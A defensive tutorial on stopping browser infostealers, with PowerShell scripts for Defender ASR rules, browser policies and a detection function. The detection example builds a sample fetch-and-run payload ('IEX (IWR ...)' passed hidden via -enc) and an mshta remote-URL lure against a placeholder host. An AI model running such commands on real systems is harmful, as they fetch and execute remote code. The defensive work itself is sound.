Infostealers run on real users’ machines, harvest browser cookies and saved passwords, and ship the lot to a Telegram channel for resale. The attack flow is short and the prevention surface is well understood; most organisations simply never configure the controls. This is the layered-defence tutorial for an SMB or department-level admin.
Layer 1: EDR with the right config
Pick one and configure it properly. The three that consistently catch modern stealer families:
- Microsoft Defender for Endpoint: included with Microsoft 365 E5, and sold to smaller shops as Defender for Business (also bundled with Microsoft 365 Business Premium). The best option when you already hold the licence.
- CrowdStrike Falcon, the gold standard, ~$50-100/seat/year for the SMB tier.
- SentinelOne, a strong competitor at similar pricing.
The configuration that matters: turn on Tamper Protection, cloud-delivered protection (real-time threat-intel lookups; several other features depend on it), Network Protection (blocks known-bad domains and IPs at the OS level, for every process rather than just the browser) and the Attack Surface Reduction (ASR) rules, in particular “Block credential stealing from the Windows local security authority subsystem (lsass.exe)” and “Block process creations originating from PSExec and WMI commands.”
Defender’s full ASR rule list is at learn.microsoft.com/defender-endpoint. Aim to enable all of them, but put each rule in audit mode first: audit hits log as Event ID 1122 and blocks as Event ID 1121 in the Microsoft-Windows-Windows Defender/Operational log, so a week of audit data tells you what will break before you switch to block. Two known frictions: the PsExec/WMI rule is incompatible with the Configuration Manager client (which relies on WMI), and the prevalence/age rule does nothing unless cloud-delivered protection is on.
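The Layer 1 procedure as one script, written for this page as an added example (it is not code from the original article or from Microsoft). It assumes Windows 10/11 with Microsoft Defender Antivirus active and an elevated PowerShell session, and uses only the documented Defender cmdlets. The three GUIDs are the published rule IDs for the rules this page names; the third is the prevalence/age rule that Layer 3 below calls the middle path, included here so the whole rule set is configured in one place.

```powershell
# Added example (not from the original page). Assumes Windows 10/11 with Microsoft Defender
# Antivirus active and an elevated PowerShell session. The GUIDs are the published ASR rule
# IDs for the three rules named on this page; the last one is the Layer 3 "middle path" rule.
$Rules = [ordered]@{
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations from PsExec and WMI'
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executables unless prevalence/age/trusted-list criterion is met'
}

# ASR action codes: 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn.
function Set-StealerAsrRules {
    param([ValidateSet('Audit', 'Block')][string]$Mode = 'Audit')
    $action = if ($Mode -eq 'Block') { 1 } else { 2 }
    foreach ($id in $Rules.Keys) {
        # Add-MpPreference adds the rule, or updates its action if it is already configured.
        # Set-MpPreference -AttackSurfaceReductionRules_Ids would REPLACE the whole rule list,
        # which is how previously enabled rules get silently dropped.
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $action
    }
}

# Cloud-delivered protection (the prevalence/age rule is inert without it) and Network Protection.
Set-MpPreference -MAPSReporting Advanced -SubmitSamplesConsent SendSafeSamples
Set-MpPreference -EnableNetworkProtection Enabled

# Audit first. Audit hits log as Event ID 1122 and blocks as 1121 in
# Microsoft-Windows-Windows Defender/Operational.
Set-StealerAsrRules -Mode Audit

# Read the state back. Tamper Protection is deliberately not settable through Set-MpPreference
# (Defender portal, Intune or the Windows Security app only), so it is verified here, not configured.
$pref = Get-MpPreference
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    $id = $pref.AttackSurfaceReductionRules_Ids[$i]
    '{0}  action={1}  {2}' -f $id, $pref.AttackSurfaceReductionRules_Actions[$i], $Rules[$id]
}
'TamperProtected: {0}' -f (Get-MpComputerStatus).IsTamperProtected

# Review the 1122 events for a week, then enforce:
#   Set-StealerAsrRules -Mode Block
```

The readback loop prints every configured rule, not just the three above, so a rule you did not expect to see (or one that quietly went back to action 0) is visible at a glance. If the last line prints False, fix Tamper Protection before anything else: a stealer loader that can run Set-MpPreference undoes the rest of this script in one line.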
Layer 2: Browser hardening
Stealers harvest cookies from the browser’s local cookie database (under the profile directory, Default\Network\Cookies in Chrome and Edge) and passwords from the Login Data file beside it. Two things that materially raise the bar:
Chrome’s App-Bound Encryption, shipped in Chrome 127 (July 2024, Windows only) with Edge following with its own implementation, wraps the cookie-store key with a service running as SYSTEM. Before it, any process running as the logged-in user could decrypt the cookie database with DPAPI alone; now bulk extraction needs elevation or a detour through the browser’s own key-retrieval path, both of which are noisier and easier to detect. It is on by default and has no toggle; the chrome://flags/#enable-bound-session-credentials flag is a different, still-experimental feature (sessions bound to the device’s TPM). Stealer families adapted within months, so treat it as raising the bar, not closing the door.
Disable saved-password storage in the browser for any account that touches sensitive systems, and move users to a password manager (1Password, Bitwarden) instead. The password manager has its own protected store that is unlocked only on demand; the browser’s saved-password store is the single largest exfiltration target.
Enterprise: deploy this via Group Policy (the PasswordManagerEnabled policy, honoured by both Chrome and Edge). Personal: Settings → Autofill → Passwords → turn off “Offer to save passwords.”
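Both halves of this layer in one script, added here as an example (not code from the original page or from Google/Microsoft). It assumes an elevated PowerShell session on Windows; the registry paths are the documented Chrome and Edge policy locations, which both browsers read even when no ADMX template is installed, and the Local State path is Chrome’s default profile location. The "APPB" tag is the prefix Chrome writes in front of the app-bound wrapped key.

```powershell
# Added example (not from the original page). Assumes an elevated PowerShell session on Windows.
# The registry paths are the documented Chrome/Edge policy locations, which both browsers read
# even when no ADMX template is installed; the Local State path is Chrome's default profile location.
$PolicyRoots = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome',
    'HKLM:\SOFTWARE\Policies\Microsoft\Edge'
)
foreach ($root in $PolicyRoots) {
    if (-not (Test-Path $root)) { New-Item -Path $root -Force | Out-Null }
    # PasswordManagerEnabled = 0: the browser neither offers to save nor autofills passwords,
    # and the user cannot turn it back on from the settings page.
    New-ItemProperty -Path $root -Name 'PasswordManagerEnabled' -Value 0 -PropertyType DWord -Force | Out-Null
}

# App-Bound Encryption check. Chrome 127+ on Windows stores the wrapped cookie key in the profile's
# Local State file under os_crypt.app_bound_encrypted_key; the base64 value decodes to bytes that
# start with the tag "APPB". Run this as the user whose profile you want to check: an elevated
# session under a different admin account would inspect that admin's own profile instead.
function Test-ChromeAppBoundKey {
    param([string]$LocalState = "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State")
    if (-not (Test-Path -LiteralPath $LocalState)) { return $false }
    $state = Get-Content -Raw -LiteralPath $LocalState | ConvertFrom-Json
    $key = $state.os_crypt.app_bound_encrypted_key
    if (-not $key) { return $false }   # pre-127 Chrome, or the key was never migrated
    $bytes = [Convert]::FromBase64String($key)
    return ($bytes.Length -gt 4 -and [Text.Encoding]::ASCII.GetString($bytes, 0, 4) -eq 'APPB')
}

'Chrome App-Bound Encryption in use: {0}' -f (Test-ChromeAppBoundKey)
# Confirm the policy landed: chrome://policy and edge://policy should list PasswordManagerEnabled = false.
```

The check reads only the wrapped key’s presence and tag; it does not decrypt anything, so it is safe to run on a user’s machine and safe to script across a fleet. A False on a Chrome 127+ install usually means a profile that was never migrated, which is worth a look because that profile’s cookies are still protected by user-level DPAPI only.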
Layer 3: Application allowlisting
The single biggest behaviour change that prevents stealer infection is not running unknown executables. Application allowlisting via Windows Defender Application Control (WDAC) or AppLocker enforces this technically, and a stealer that never executes never steals anything.
The reality is that small organisations rarely run allowlisting, because the maintenance burden is real: every new tool and every updater needs a rule. The middle path is Defender’s “Block executable files from running unless they meet a prevalence, age, or trusted list criterion” ASR rule, which is much lighter to operate and catches a meaningful share of fresh stealer drops, since a freshly built binary that the cloud has never seen fails both the prevalence and the age check. It needs cloud-delivered protection on, and it does not gate signed, widely distributed binaries, so it is a complement to allowlisting rather than a replacement.
Layer 4: DNS-level blocking
Stealers exfiltrate to known C2 domains or, very commonly, to the Telegram Bot API. DNS-level blocking stops the ones whose domains are already on a blocklist before exfil happens; it does nothing for a stealer that uses a hard-coded IP or a domain registered this morning, and it only works if endpoints actually use the filtered resolver (block outbound DNS and DNS-over-HTTPS to anything else). If nobody in the business uses Telegram, blocking api.telegram.org cuts off the exfil channel named at the top of this page.
- Cloudflare Gateway, free for up to 50 users, includes a malicious-domain blocklist by default.
- NextDNS, $20/year per user, similar coverage, easier setup.
- Pi-hole with a curated blocklist, free if you have a Raspberry Pi.
Subscribe to the abuse.ch feeds: URLhaus for fresh malware-distribution hosts and ThreatFox for IOCs including stealer C2 domains. FeodoTracker is an IP-based botnet C2 list and belongs on the firewall rather than the resolver.
Layer 5: User training that actually works
The infection vector for most stealers in 2026 is “user pasted a PowerShell command they were told to paste”, the pattern known as ClickFix: typically a fake CAPTCHA page or a “verification required” prompt on a malicious site. The phrasing varies but the steps are always the same: copy this command, open Run/Terminal, paste, hit Enter. Nothing was downloaded and nothing was double-clicked, which is exactly why it slips past users trained on attachments.
The training rule is simple: never paste anything into Run/Terminal/PowerShell that you didn’t write yourself. Every other rule is a corollary. Reinforce it monthly, and back it with policy where you can: the “Remove Run menu from Start Menu” user policy also disables Win+R, which removes the path most of these lures depend on.
Layer 6: Detection, assume infection sometimes
Stealer detection patterns that work in EDR/SIEM:
- A non-browser process reading the Chrome/Edge cookie database (Default\Network\Cookies under the profile directory) or the Login Data file. Sysmon does not log file reads, so this needs EDR file-access telemetry or a SACL on those files with Windows Event ID 4663.
- Outbound HTTPS POST to a recently registered domain with a large body and no referrer. Only a TLS-inspecting proxy sees the method and body; without one, alert on a first-seen destination that receives far more bytes than it sends.
- An encrypted ZIP/RAR written to %TEMP% and uploaded within seconds (stealers bundle their loot this way before exfil).
- powershell.exe or mshta.exe launched with an -EncodedCommand/-enc payload or a hidden window, especially with explorer.exe as the parent, which is what the Run-dialog paste from Layer 5 looks like in telemetry.
Each of these is a detection rule worth writing. The SigmaHQ rules repository on GitHub has community-maintained versions of most of them that you can lift directly.
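The last pattern in the list, run over constructed process-creation records, as an added example (not code from the original page and not a Sigma rule). The three records are made up for this example and shaped like the Image, ParentImage and CommandLine fields of Sysmon Event ID 1; the first is built the way a ClickFix lure builds its payload (UTF-16LE, base64, -enc), the second is ordinary admin scripting that must not fire, the third is an mshta lure. The hostname example.test is a placeholder.

```powershell
# Added example (not from the original page). Runs offline over constructed records shaped like
# the fields of Sysmon Event ID 1 (process creation). In production, feed it
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
# with Image, ParentImage and CommandLine mapped from each event's EventData.

# Constructed sample: record 1 is built the way a ClickFix lure builds its payload
# (UTF-16LE, base64, -enc); record 2 is ordinary admin scripting; record 3 is an mshta lure.
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX (IWR https://example.test/v.ps1)'))
$Sample = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = "powershell -w hidden -ep bypass -enc $enc" }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Program Files\Microsoft VS Code\Code.exe'
                       CommandLine = 'powershell -NoProfile -ExecutionPolicy RemoteSigned -File build.ps1' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'mshta https://example.test/verify.hta' }
)

# powershell.exe accepts -EncodedCommand and its abbreviations (-e, -ec, -en, -enc). Requiring a
# 16+ character base64 token after the switch keeps "-ExecutionPolicy Bypass" from matching.
function Get-EncodedPayload {
    param([string]$CommandLine)
    if ($CommandLine -match '(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # looked like base64 but was not
    }
    return $null
}

function Find-StealerLaunch {
    param([object[]]$Events)
    foreach ($e in $Events) {
        $leaf    = (Split-Path -Leaf $e.Image).ToLower()
        $parent  = (Split-Path -Leaf $e.ParentImage).ToLower()
        $reasons = @()
        $decoded = Get-EncodedPayload $e.CommandLine
        if ($decoded) {
            $reasons += 'encoded command'
            # Download-and-execute primitives inside the decoded payload.
            if ($decoded -match '\b(IEX|Invoke-Expression|IWR|Invoke-WebRequest|DownloadString|Net\.WebClient)\b') {
                $reasons += 'download-and-execute in payload'
            }
        }
        if ($e.CommandLine -match '-w(?:indowstyle)?\s+h(?:idden)?\b') { $reasons += 'hidden window' }
        if ($leaf -eq 'mshta.exe' -and $e.CommandLine -match 'https?://') { $reasons += 'mshta with remote URL' }
        # explorer.exe as parent is how the Run dialog (Win+R) and File Explorer launch things. It is
        # also how the Start menu launches a console, so on its own it is context, not an alert.
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image            = $leaf
                Parent           = $parent
                RunDialogPattern = ($parent -eq 'explorer.exe' -and $leaf -in @('powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe'))
                Reasons          = $reasons -join '; '
                Decoded          = $decoded
            }
        }
    }
}

Find-StealerLaunch $Sample | Format-List
```

Records 1 and 3 come out flagged (the first with the decoded command line attached, which is what an analyst wants to read first); record 2 produces nothing. The decoding step is the part worth keeping when you port this to your SIEM: a rule that only matches the -enc switch will fire on legitimate tooling that uses it, whereas matching IEX, Invoke-WebRequest or DownloadString inside the decoded text is close to noise-free.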
The maintenance cycle
Quarterly: review EDR alert volumes, tune the false positives, and refresh the DNS blocklist sources. Monthly: check Hudson Rock or your monitoring service for stealer logs that mention your domains, and reset any credentials that appear. Continuously: when an infection is found, do the post-mortem to figure out which layer let it through, and fix that layer.
No single control catches every stealer. Layered, the success rate is high enough that infections become rare events worth investigating thoroughly when they do happen, instead of a constant background hum.
